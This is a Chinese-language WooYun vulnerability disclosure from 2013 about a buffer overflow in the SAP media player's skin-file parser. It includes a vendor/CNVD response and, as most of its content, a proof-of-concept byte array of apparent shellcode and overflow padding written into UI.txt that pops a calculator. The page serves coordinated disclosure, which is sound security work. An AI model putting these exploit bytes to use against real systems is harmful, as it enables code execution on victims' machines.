漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-016921
漏洞标题:SAP播放器缓冲区溢出漏洞
相关厂商:SAP
漏洞作者: cssembly
提交时间:2013-01-04 20:21
修复时间:2013-02-18 20:22
公开时间:2013-02-18 20:22
漏洞类型:远程代码执行
危害等级:高
自评Rank:12
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-01-04: 细节已通知厂商并且等待厂商处理中
2013-01-07: 厂商已经确认,细节仅向厂商公开
2013-01-10: 细节向第三方安全合作伙伴开放
2013-03-03: 细节向核心白帽子及相关领域专家公开
2013-03-13: 细节向普通白帽子公开
2013-03-23: 细节向实习白帽子公开
2013-02-18: 细节向公众公开
简要描述:
SAP播放器对皮肤文件解析时存在缓冲区溢出漏洞,导致执行任意代码。
详细说明:
SAP启动过程中会加载skin\default目录下的UI.txt文件,由于程序并未对内容进行校验,导致加载畸形文件时发生缓冲区溢出,执行恶意代码!
POC如下:
0xDB, 0xC0, 0x31, 0xC9, 0xBF, 0x7C, 0x16, 0x70,
0xCC, 0xD9, 0x74, 0x24, 0xF4, 0xB1, 0x1E, 0x58,
0x31, 0x78, 0x18, 0x83, 0xE8, 0xFC, 0x03, 0x78,
0x68, 0xF4, 0x85, 0x30, 0x78, 0xBC, 0x65, 0xC9,
0x78, 0xB6, 0x23, 0xF5, 0xF3, 0xB4, 0xAE, 0x7D,
0x02, 0xAA, 0x3A, 0x32, 0x1C, 0xBF, 0x62, 0xED,
0x1D, 0x54, 0xD5, 0x66, 0x29, 0x21, 0xE7, 0x96,
0x60, 0xF5, 0x71, 0xCA, 0x06, 0x35, 0xF5, 0x14,
0xC7, 0x7C, 0xFB, 0x1B, 0x05, 0x6B, 0xF0, 0x27,
0xDD, 0x48, 0xFD, 0x22, 0x38, 0x1B, 0xA2, 0xE8,
0xC3, 0xF7, 0x3B, 0x7A, 0xCF, 0x4C, 0x4F, 0x23,
0xD3, 0x53, 0xA4, 0x57, 0xF7, 0xD8, 0x3B, 0x83,
0x8E, 0x83, 0x1F, 0x57, 0x53, 0x64, 0x51, 0xA1,
0x33, 0xCD, 0xF5, 0xC6, 0xF5, 0xC1, 0x7E, 0x98,
0xF5, 0xAA, 0xF1, 0x05, 0xA8, 0x26, 0x99, 0x3D,
0x3B, 0xC0, 0xD9, 0xFE, 0x51, 0x61, 0xB6, 0x0E,
0x2F, 0x85, 0x19, 0x87, 0xB7, 0x78, 0x2F, 0x59,
0x90, 0x7B, 0xD7, 0x05, 0x7F, 0xE8, 0x7B, 0xCA,
0x7E, 0x34, 0x41, 0x41, 0x41, 0x7E, 0x35, 0x41,
0x41, 0x41, 0x7E, 0x36, 0x41, 0x41, 0x41, 0x7E,
0x37, 0x41, 0x41, 0x41, 0x7E, 0x38, 0x41, 0x41,
0x41, 0x7E, 0x39, 0x41, 0x41, 0x41, 0x7E, 0x30,
0x41, 0x41, 0x41, 0x7E, 0x21, 0x41, 0x41, 0x41,
0x7E, 0x61, 0x41, 0x41, 0x41, 0x7E, 0x62, 0x41,
0x41, 0x41, 0x7E, 0x63, 0x41, 0x41, 0x41, 0x7E,
0x64, 0x41, 0x41, 0x41, 0x7E, 0x65, 0x41, 0x41,
0x41, 0x7E, 0x66, 0x41, 0x41, 0x41, 0x7E, 0x67,
0x41, 0x41, 0x41, 0x7E, 0x68, 0x41, 0x41, 0x41,
0x7E, 0x69, 0x41, 0x41, 0x41, 0xE9, 0x16, 0xFF,
0xFF, 0xFF, 0x7E, 0x6B, 0xEB, 0xF7, 0x41, 0x7E,
0x71, 0x15, 0xFA, 0x7F, 0x7E, 0x6D, 0x41, 0x41,
0x41, 0x7E, 0x6E, 0x41, 0x41, 0x41, 0x7E, 0x6F,
0x41, 0x41, 0x41, 0x7E, 0x70, 0x41, 0x41, 0x41,
0x7E, 0x71, 0x41, 0x41, 0x41, 0x7E, 0x72, 0x41,
0x41, 0x41, 0x7E, 0x73, 0x41, 0x41, 0x41, 0x7E,
0x74, 0x41, 0x41, 0x41, 0x7E, 0x75, 0x41, 0x41,
0x41, 0x7E, 0x76, 0x41, 0x41, 0x41, 0x7E, 0x77,
0x41, 0x41, 0x41, 0x7E, 0x73, 0x41, 0x41, 0x41,
0x7E, 0x79, 0x41, 0x41, 0x41, 0x7E, 0x7A, 0x41,
0x41, 0x41, 0x7E, 0x40, 0x41, 0x41, 0x41, 0x7E,
0x23, 0x41, 0x41, 0x41, 0x7E, 0x24, 0x41, 0x41,
0x41, 0x7E, 0x25, 0x41, 0x41, 0x41, 0x7E, 0x5E,
0x41, 0x41, 0x41, 0x7E, 0x26, 0x41, 0x41, 0x41,
0x7E, 0x2A, 0x41, 0x41, 0x41, 0x7E, 0x28, 0x41,
0x41, 0x41, 0x7E, 0x29, 0x41, 0x41, 0x41, 0x7E,
0x5F, 0x41, 0x41, 0x41, 0x7E, 0x2B, 0x41, 0x41,
0x41, 0x7E, 0x41, 0x42, 0x41, 0x41, 0x7E, 0x42,
0x42, 0x41, 0x41, 0x7E, 0x43, 0x42, 0x41, 0x41,
0x7E, 0x44, 0x42, 0x41, 0x41, 0x7E, 0x45, 0x42,
0x41, 0x41, 0x7E, 0x46, 0x42, 0x41, 0x41, 0x7E,
0x47, 0x42, 0x41, 0x41, 0x7E, 0x48, 0x42, 0x41,
0x41, 0x7E, 0x49, 0x42, 0x41, 0x41, 0x7E, 0x4A,
0x42, 0x41, 0x41, 0x7E, 0x4B, 0x42, 0x41, 0x41,
0x7E, 0x4C, 0x42, 0x41, 0x41, 0x7E, 0x4D, 0x42,
0x41, 0x41, 0x7E, 0x4E, 0x42, 0x41, 0x41, 0x7E,
0x4F, 0x42, 0x41, 0x41, 0x7E, 0x50, 0x42, 0x41,
0x41, 0x7E, 0x51, 0x42, 0x41, 0x41, 0x7E, 0x52,
0x42, 0x41, 0x41, 0x7E, 0x53, 0x42, 0x41, 0x41,
0x7E, 0x54, 0x42, 0x41, 0x41, 0x7E, 0x55, 0x42,
0x41, 0x41, 0x7E, 0x56, 0x42, 0x41, 0x41, 0x7E,
0x57, 0x42, 0x41, 0x41, 0x7E, 0x58, 0x42, 0x41,
0x41, 0x7E, 0x59, 0x42, 0x41, 0x41, 0x7E, 0x5A,
0x42, 0x41, 0x41, 0x7E, 0x31, 0x42, 0x41, 0x41,
0x7E, 0x32, 0x42, 0x41, 0x41, 0x7E, 0x33, 0x42,
0x41, 0x41, 0x7E, 0x34, 0x42, 0x41, 0x41, 0x7E,
0x35, 0x42, 0x41, 0x41, 0x7E, 0x36, 0x42, 0x41,
0x41, 0x7E, 0x37, 0x42, 0x41, 0x41, 0x7E, 0x38,
0x42, 0x41, 0x41, 0x7E, 0x39, 0x42, 0x41, 0x41,
0x7E, 0x30, 0x42, 0x41, 0x41, 0x7E, 0x21, 0x42,
0x41, 0x41, 0x7E, 0x61, 0x42, 0x41, 0x41, 0x7E,
0x62, 0x42, 0x41, 0x41, 0x7E, 0x63, 0x42, 0x41,
0x41, 0x7E, 0x64, 0x42, 0x41, 0x41, 0x7E, 0x65,
0x42, 0x41, 0x41, 0x7E, 0x66, 0x42, 0x41, 0x41,
0x7E, 0x67, 0x42, 0x41, 0x41, 0x7E, 0x68, 0x42,
0x41, 0x41, 0x7E, 0x69, 0x42, 0x41, 0x41, 0x7E,
0x6A, 0x42, 0x41, 0x41, 0x7E, 0x6B, 0x42, 0x41,
0x41, 0x7E, 0x6C, 0x42, 0x41, 0x41, 0x7E, 0x6D,
0x42, 0x41, 0x41, 0x7E, 0x6E, 0x42, 0x41, 0x41,
0x7E, 0x6F, 0x42, 0x41, 0x41, 0x7E, 0x70, 0x42,
0x41, 0x41, 0x7E, 0x71, 0x42, 0x41, 0x41, 0x7E,
0x72, 0x42, 0x41, 0x41, 0x7E, 0x73, 0x42, 0x41,
0x41, 0x7E, 0x74, 0x42, 0x41, 0x41, 0x7E, 0x75,
0x42, 0x41, 0x41, 0x7E, 0x76, 0x42, 0x41, 0x41,
0x7E, 0x77, 0x42, 0x41, 0x41, 0x7E, 0x73, 0x42,
0x41, 0x41, 0x7E, 0x79, 0x42, 0x41, 0x41, 0x7E,
0x7A, 0x42, 0x41, 0x41, 0x7E, 0x40, 0x42, 0x41,
0x41, 0x7E, 0x23, 0x42, 0x41, 0x41, 0x7E, 0x24,
0x42, 0x41, 0x41, 0x7E, 0x25, 0x42, 0x41, 0x41,
0x7E, 0x5E, 0x42, 0x41, 0x41, 0x7E, 0x26, 0x42,
0x41, 0x41, 0x7E, 0x2A, 0x42, 0x41, 0x41, 0x7E,
0x28, 0x42, 0x41, 0x41, 0x7E, 0x29, 0x42, 0x41,
0x41, 0x7E, 0x5F, 0x42, 0x41, 0x41, 0x7E, 0x2B,
0x42, 0x41, 0x41, 0x7E, 0x41, 0x43, 0x41, 0x41,
0x7E, 0x42, 0x43, 0x41, 0x41, 0x7E, 0x43, 0x43,
0x41, 0x41, 0x7E, 0x44, 0x43, 0x41, 0x41, 0x7E,
0x45, 0x43, 0x41, 0x41, 0x7E, 0x46, 0x43, 0x41,
0x41, 0x7E, 0x47, 0x43, 0x41, 0x41, 0x7E, 0x48,
0x43, 0x41, 0x41, 0x7E, 0x49, 0x43, 0x41, 0x41,
0x7E, 0x4A, 0x43, 0x41, 0x41, 0x7E, 0x4B, 0x43,
0x41, 0x41, 0x7E, 0x4C, 0x43, 0x41, 0x41, 0x7E,
0x4D, 0x43, 0x41, 0x41, 0x7E, 0x4E, 0x43, 0x41,
0x41, 0x7E, 0x4F, 0x43, 0x41, 0x41, 0x7E, 0x50,
0x43, 0x41, 0x41, 0x7E, 0x51, 0x43, 0x41, 0x41,
0x7E, 0x52, 0x43, 0x41, 0x41, 0x7E, 0x53, 0x43,
0x41, 0x41, 0x7E, 0x54, 0x43, 0x41, 0x41, 0x7E,
0x55, 0x43, 0x41, 0x41, 0x7E, 0x56, 0x43, 0x41,
0x41, 0x7E, 0x57, 0x43, 0x41, 0x41, 0x7E, 0x58,
0x43, 0x41, 0x41, 0x7E, 0x59, 0x43, 0x41, 0x41
漏洞证明:
修改文件内容为POC的内容
双击执行程序
漏洞触发弹出计算器
修复方案:
版权声明:转载请注明来源 cssembly@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-01-07 22:18
厂商回复:
CNVD确认并复现所述情况,cssembly对于SAP播放器的研究较为全面,此案例为第二例。经过近几日努力,已由CNVD通过英文邮件向国外软件生产厂商通报,是否处置待后续反馈。
按通用软件漏洞进行评分,与上例相比,此例利用价值相对较小。rank 10
最新状态:
暂无